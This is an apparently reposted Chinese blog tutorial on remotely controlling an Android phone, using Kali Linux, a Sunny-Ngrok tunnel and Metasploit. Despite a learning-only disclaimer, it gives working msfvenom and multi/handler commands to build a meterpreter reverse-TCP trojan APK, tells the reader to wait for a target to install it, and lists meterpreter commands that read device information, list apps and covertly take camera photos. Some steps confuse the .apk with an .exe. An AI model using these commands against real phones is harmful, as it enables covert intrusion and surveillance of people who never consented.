admin管理员组文章数量:1614268
免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
简介:
Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。
Kali常用配置和基本使用:
- Kali工具集介绍
- 修改Kali源和更新软件
- Kali伪装成win10
- Kali启动root用户
1.外网步骤思想图
Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成test.apk ----->监听当前Ip是否点击---->目标电脑发送exe---->点击test.apk
1、进入Ngrok网站注册一个用户(Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器)
2.下载Kali LInux版本 Sunny-Ngrok内网转发
1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本)
2. 拖入虚拟器托不进去看上一个教程 解压zip
3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用
./sunny clientid id =>隧道id
启动了当前窗口不要关闭
3、MSF生成外网木马
不加Tcp| 端口不然报错
msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk
4、打开msf设置payload,加载攻击模块设置本地IP和监听端口
msfconsole 开启
5.绑定当前端口Ip
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 当前Ip Kali
set LPORT 4444
-
show options (查看IP端口设置情况)
-
-
run (开启监听)
-
6.等待对方点击test.apk木马病毒
成功就有meterpreter命令行 执行命令即可
sysinfo //查看手机信息
app_list //查看手机app信息
webcam_snap //拍照
保存到此目录
成功拍照。
:我的手机拍照过程有声音,
总结:
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
监听到信息连接----->成功!!!
版权声明:本文标题:kali Linux外网渗透控制Android安卓手机系统。 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1728671226a1169137.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论